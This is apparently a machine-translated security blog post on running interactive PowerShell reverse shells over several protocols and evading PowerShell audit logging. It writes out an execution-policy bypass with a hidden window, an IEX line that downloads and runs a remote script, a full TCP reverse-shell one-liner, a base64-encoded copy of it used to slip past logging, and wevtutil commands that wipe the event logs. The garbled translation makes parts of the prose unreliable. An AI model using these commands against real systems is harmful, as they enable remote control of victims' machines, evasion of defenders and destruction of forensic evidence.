Mickey · 2015/05/20″
0 x00 preface
When I saw the http://zone.wooyun.org/content/20429 DM_ ox hair, I can’t be calm once in a mood for a long time, this should belong to my essence + WB, took his starters, this doll is really hateful, hateful: -), and then DM_ cow sent me some information for me to learn, I wrote this article, just entry, there must be mistakes, I hope friends to discuss, point out.
This time Labofapenetrationtester is released in the form of “Week of Powershell shell”, that is, one piece per day, a total of five pieces, respectively
Day 1 - Interactive PowerShell shells over TCP
Day 2 - Interactive PowerShell shells over UDP
Day 3 - Interactive PowerShell shells over HTTP/HTTPS
Day 4 - Interactive PowerShell shells with WMI
Day 5 - Interactive PowerShell shells over ICMP and DNS
Copy the code
0 x01 three days before
For TCP,UDP,HTTP, and HTTPS packets in the first three days, you can upload the PS1 script to the target and execute it
#! bash D:\>PowerShell.exe -ep Bypass -File d:\Invoke-PowerShellUdp.ps1Copy the code
I’m going to use a different protocol, and I’m going to use UDP, as shown here
Listen on the port first, and then rebound. Otherwise, an error will be reported.
For real environment attacks, I often add the -nologo-noninteractive -noprofile-windowstyle Hidden parameter as follows
#! bash PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File d:\Invoke-PowerShellUdp.ps1Copy the code
Another way to play is if the other party is connected to the Internet, you can directly use IEX to download the remote PS1 script and execute it.
#! bash IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')Copy the code
0x02 Day 4 – Interactive PowerShell shells with WMI
This is usually only used on the internal network, can completely replace the psexec, the author here uses the namespace to save the WMI execution results, and finally retrieve the return display results is very good idea, solve the WMI remote direct command does not echo the problem. Of course, to run this script, you need administrator privileges and enter the other party’s account.
0x03 Day 5 – Interactive PowerShell shells over ICMP and DNS
If this script is run using ICMP, it is only necessary to note that it is executed locally first
#! bash[email protected]:~/Desktop# sysctl -w net.ipv4.icmp_echo_ignore_all=1
Copy the code
Otherwise, the rebound will not work, I believe that the students who have used ICMPSH know.
Later a foreign BLOG said that if you do the following configuration, you can find the Powershell attack behavior and see the attack code
Configuration requirements are as follows:
- Create a profile.ps1 in C:\Windows\System32\WindowsPowerShell\v1.0
Fill in the following
# !bash
CD D:\ $LogCommandHealthEvent = $true $LogCommandLifecycleEvent = $true
Copy the code
- Right click on profile.ps1, click “Security” -> “Advanced” -> “Audit” once, click the “Compile” button, add user “everyone”, and open the audit items as shown in the picture
- Since the log will become very large after doing so, increase the log capacity accordingly in order to encode rollback coverage, as shown in the figure
How do you get around that? Because he added a file audit to profile.ps1, the strategy of modifying or moving/deleting the file would not work.
After executing the rebound script, you can see the details by filtering events with eventID of 500 in the Windows PowerShell event class in the Event Viewer
#! Bash CommandLine = $client = New - Object System.Net.Sockets.TCPClient (" 10.18.180.10 ", 8888); $stream = $client.GetStream(); [byte[]]$bytes = 0.. 255 | % {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text language=".encoding"][/text]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()Copy the code
As shown in figure:
At first, I thought that the -noprofile option could bypass this limitation. After practice, I found that it was not possible, and I would still see it in the log. Then I combined with the -enc option to base64 encoding, as follows:
#! bash powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwA aQBlAG4AdAAoACIAMQAwAC4AMQA4AC4AMQA4ADAALgAxADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcA ZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgAyADUANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUA KAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkA KQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUA bQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkA OwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQA cwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsA IAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUA dABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwA JABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwA bwBzAGUAKAApAA0ACgANAAoACopy the code
(CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=)
The absolute way to do this, of course, is to run out of Powershell on your target
#! bash wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system"Copy the code
Of course, if the permission is low, there is no way 🙁
The benefits of using Powershell for attacks are obvious, eliminating the need to kill (in my tests), facilitating transport (when injected), and being built in (since Windows 7). But even if the administrator does not open the audit as above, there is still a trace by default, which will be discussed in the next article. Some friends like to infiltrate all add me to discuss, their own slow.
Reference article:
http://x0day.me/
http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html